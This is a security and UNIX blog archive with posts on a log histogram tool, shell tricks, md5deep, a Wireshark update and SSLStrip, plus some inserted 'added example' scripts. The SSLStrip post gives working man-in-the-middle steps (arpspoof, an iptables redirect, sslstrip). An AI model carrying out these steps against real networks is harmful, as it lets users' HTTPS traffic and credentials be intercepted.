Archive for the ‘Seguranca’ Category

Despite all the wonderful text-oriented and processing tools in UNIX, one tool is surprisingly absent: an ability to generate some kind of text-based graph from an input stream. This would be useful for all sorts of things, but most notably for “eye-balling” the relative frequencies of similar data-sets. Such data-sets could be: logs of every sort, file-types in a directory, version control statistics, etc. The graph could be a simple thing, such as dashes that take up to the width of the current TTY. But as far as I could tell, no such tool exists.

Until now.

So here I present step-by-step instructions on how to write such a tool in Perl. If you are in a hurry, you can simply download the tool, rename it to just “histogram”, make it executable, and put it in your bin directory.

In the posts that follow, I’ll detail its usage and construction.

Here’s a quick example usage and output:

$ histogram '/ sshd\[[0-9]*\]: Connection closed by UNKNOWN/ { print substr($3,1,2) }' /var/log/secure*
00:———————————————————————-
01:————————————————————————–
02:—————————————————————————
03:————————————————————————–
04:————————————————————————–
05:—————————————————————————
06:—————————————————————————
07:—————————————————————————–
08:—————————————————————————-
09:————————————————————————-
10:—————————————————————————-
11:—————————————————————————
12:———————————————————————–
13:————————————————————————-
14:——————————————-
15:—————————————
16:———————————–
17:————————————-
18:————————————–
19:————————————
20:————————————-
21:————————————
22:—————————————-
23:————————————–
What we’re trying to do here is get an idea of how often attackers are hammering the system with SSH connection attempts. So we use awk to look through the /var/log/secure logs for a string like “sshd … Connection closed by UNKNOWN” and print out the hour of the day each time the message occurred. histogram then does the rest and prints out a “graph” so we can get an idea of the distribution of attack times — were they in the morning, the afternoon, all day, or what? In this case, it seems to be from midnight to about 2pm.
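The same idea in plain POSIX shell, as an added example (not the post's Perl tool): an awk program selects and prints the keys, sort and uniq -c count them, and a second awk pass draws one dash bar per key, scaled so the most frequent key fills the width given by HISTOGRAM_WIDTH (an assumed variable; 72 if unset).

```shell
#!/bin/sh
# Added example, not the post's Perl tool: a POSIX-shell "histogram" that
# runs an awk program over its input, counts each distinct line the awk
# program prints, and draws one dash bar per key, scaled so the most
# frequent key fills the available width (HISTOGRAM_WIDTH, else 72).
# Usage: histogram 'AWK-PROGRAM' [FILE...]   (keys are single tokens)

histogram() {
    prog=$1
    shift
    width=${HISTOGRAM_WIDTH:-72}
    # awk selects and prints the keys; sort | uniq -c counts them,
    # producing "<count> <key>" lines already ordered by key
    awk "$prog" "$@" | sort | uniq -c |
    awk -v width="$width" '
        { keys[n++] = $2; count[$2] = $1; if ($1 > max) max = $1 }
        END {
            for (i = 0; i < n; i++) {
                k = keys[i]
                avail = width - length(k) - 1     # room left after "key:"
                len = int(count[k] * avail / max)
                bar = ""
                for (j = 0; j < len; j++) bar = bar "-"
                printf "%s:%s\n", k, bar
            }
        }'
}
```

Run it exactly like the Perl version, e.g. with the awk program from the example above and /var/log/secure* as the files.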

Read Full Post »

I was screwing around this morning and I needed some random words to test something with. The words needed to be real words, not just random sequences of characters (btw, you can generate a random sequence of 8 characters from the shell using jot -r -c 8 a z | rs -g 0 8). In this case, I decided to simply grab a random word from /usr/share/dict/words.

Hmm, but how do I grab a random word from a file? My solution was to generate a random number in the range [1..n] where n is the number of lines in the file, cat -n the file so that line numbers are printed, grep for the line matching the random number, then print out the second column. It looks like this:

$ n=$(cat /usr/share/dict/words | wc -l)
$ cat -n /usr/share/dict/words | grep -w $(jot -r 1 1 $n) | cut -f2
idic
$ cat -n /usr/share/dict/words | grep -w $(jot -r 1 1 $n) | cut -f2
goldentop
$ cat -n /usr/share/dict/words | grep -w $(jot -r 1 1 $n) | cut -f2
Hamitism
$ cat -n /usr/share/dict/words | grep -w $(jot -r 1 1 $n) | cut -f2
accumulativeness
$ cat -n /usr/share/dict/words | grep -w $(jot -r 1 1 $n) | cut -f2
ratihabition
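A single-pass alternative, as an added example that is not the post's own pipeline: reservoir sampling in awk picks a line uniformly at random without counting lines first and without grep -w having to match a line number. The function name and the optional seed argument are assumptions for the example.

```shell
# Added example, not the post's own pipeline: choose one line of a file
# uniformly at random in a single pass (reservoir sampling with k = 1).
# This avoids counting the lines first and avoids the grep -w ambiguity
# where a line number could also match text elsewhere on a line.
# An optional second argument seeds awk's generator for reproducible picks.
random_line() {
    file=$1
    seed=${2:-$(date +%s)}
    awk -v seed="$seed" '
        BEGIN { srand(seed) }
        # replace the candidate with probability 1/NR; after N lines each
        # line survives with probability exactly 1/N
        rand() < 1 / NR { chosen = $0 }
        END { if (NR > 0) print chosen }' "$file"
}
```

Call it as random_line /usr/share/dict/words for a fresh word each time.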

Read Full Post »

In Debian and derived distros, to install the package:

sudo apt-get update

sudo apt-get install md5deep

The utilities installed also include sha1deep, sha256deep, etc. Their syntax is the same;
the only thing that varies is the checksum format (the length of the sum’s string representation).

To check a file’s (or various files’) integrity use the command:

md5deep -wem [ … ]

Options:

w shows which file matched which checksum entry (a filename, too); e shows the estimated time remaining
(and how much of the current file has been checked); m is match mode: files are hashed and compared
against the sums in the list, and every file that matches is displayed. But what if you have
lots of files to check? You do not want to see each file that matched, only the files that did not
match. Here is how:

md5deep -esx [ … ]

Options:

e shows the estimated time remaining (and how much of the current file has been checked); s is
silent mode, so you see only which files did not match and nothing else; x is negative matching
mode, i.e. only files that did not match are displayed. For a recursive match, a possible (and common)
use is to add the -r option for a recursive check and, instead of files, point to the base
directory (matching the dirname of the entries in the checksum file), which in the example is the
current working directory, a.k.a. ‘.’ (a dot):

md5deep -resx .

VERY IMPORTANT NOTE: the -m and -x options must immediately precede the checksum file, as that file is an
argument to these options. So, if you condense the options as in the examples given, you must
ensure that -m (or -x) is the last option, because the argument that follows is actually this option’s
argument.
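For hosts where md5deep is not installed, here is an added example (not part of md5deep) that emulates its negative-match mode: it reads a list in md5deep's own output format (the sum, two spaces, the path) and reports only files whose current sum differs or which are missing. It assumes coreutils md5sum; the function name is an assumption.

```shell
# Added example, not part of md5deep: a portable stand-in for md5deep's
# negative-match mode (-x) for hosts where md5deep is not installed. It
# reads a list in md5deep's own output format ("<md5>  <path>", two
# spaces) and prints only the files whose current sum differs from the
# list, or which are now missing. Assumes coreutils md5sum is available.
check_negative() {
    list=$1
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        expected=${line%%  *}   # text before the first double space
        path=${line#*  }        # text after it
        if [ ! -f "$path" ]; then
            printf 'MISSING: %s\n' "$path"
        elif [ "$(md5sum "$path" | cut -d' ' -f1)" != "$expected" ]; then
            printf 'MISMATCH: %s\n' "$path"
        fi
    done < "$list"
}
```

Generate the list with md5deep -r . > sums.txt on a known-good tree, then run check_negative sums.txt later to see only what changed.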

Read Full Post »

As the world’s most popular network protocol analyzer, Wireshark now has an update to versions 1.4.4 and 1.2.15. This update fixes many vulnerabilities, such as CVE-2011-0538, CVE-2011-0713 and the NTLMSSP dissector.

The following protocols were updated: ANSI MAP, BitTorrent, DCM, DHCPv6, DTAP, DTPT, E.212, GSM Management, GTP, HIP, IEEE 802.15.4, IPP, LDAP, LLDP, Netflow, NTLMSSP, P_Mul, Quake, Skinny, SMB, SNMP, ULP. In addition, captures from LANalyzer and Nokia DCT3, and files in the Pcap-ng format, can now be read.

For a complete list of changes, see:
Docs: http://www.wireshark.org
Download: http://www.wireshark.org
Source: http://www.pentestit.com

Read Full Post »

Since Moxie Marlinspike showed his SSLStrip at Black Hat, many people’s PARANOID MODE has started sounding the alarm, and not without reason, since with this tool anyone can capture your SSL traffic without trouble.

SSLStrip’s operation is simple: it replaces every “https://” request on a page with “http://” and performs a MITM (Man-In-The-Middle) between the server and the client.
The idea is that the victim and the attacker communicate over HTTP, while the attacker and the server communicate over HTTPS, with the server’s certificate. The attacker is therefore able to see all of the victim’s traffic in plain text.

In short, the steps would be:

Enable IP forwarding:
# echo 1 > /proc/sys/net/ipv4/ip_forward

Carry out an ARP MITM attack between the 2 machines:
# arpspoof -i eth0 -t HOST_ALVO

Redirect the traffic with iptables:
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

Start SSLStrip, specifying a file where it will store the captured data:
# python sslstrip.py -w archivo
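From the defender's side, the ARP poisoning step above leaves a visible trace on the victim: the MAC address cached for the gateway changes. The following added example (not from the post) checks the neighbour table printed by "ip neigh show" on Linux against a known-good gateway MAC; the function names and the sample table in the test are constructed for the example.

```shell
# Added example, not from the post: a defender-side check for the ARP
# poisoning step described above. It reads the neighbour table printed
# by "ip neigh show" (Linux) on stdin and compares the MAC cached for the
# gateway with a known-good value; a changed MAC is the symptom an ARP
# spoofing tool leaves on the victim. Function names are assumptions.
gateway_mac() {        # $1 = gateway IP; stdin = neighbour table
    awk -v gw="$1" '
        $1 == gw { for (i = 1; i < NF; i++) if ($i == "lladdr") print $(i + 1) }'
}
check_gateway() {      # $1 = gateway IP, $2 = expected MAC; stdin = table
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    actual=$(gateway_mac "$1" | head -n 1 | tr 'A-F' 'a-f')
    if [ -z "$actual" ]; then
        echo "UNKNOWN"                      # gateway not in the cache
        return 2
    elif [ "$actual" = "$expected" ]; then
        echo "OK $actual"
        return 0
    fi
    echo "CHANGED expected $expected got $actual"   # possible ARP spoofing
    return 1
}
```

On a live host run ip neigh show | check_gateway 192.168.1.1 00:11:22:33:44:55 (with your own gateway IP and MAC) from cron and alert on a non-zero exit status.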

I hope you find it interesting!

Official SSLStrip page: http://www.thoughtcrime.org/software/sslstrip/

Posted by Luiz Vieira

Read Full Post »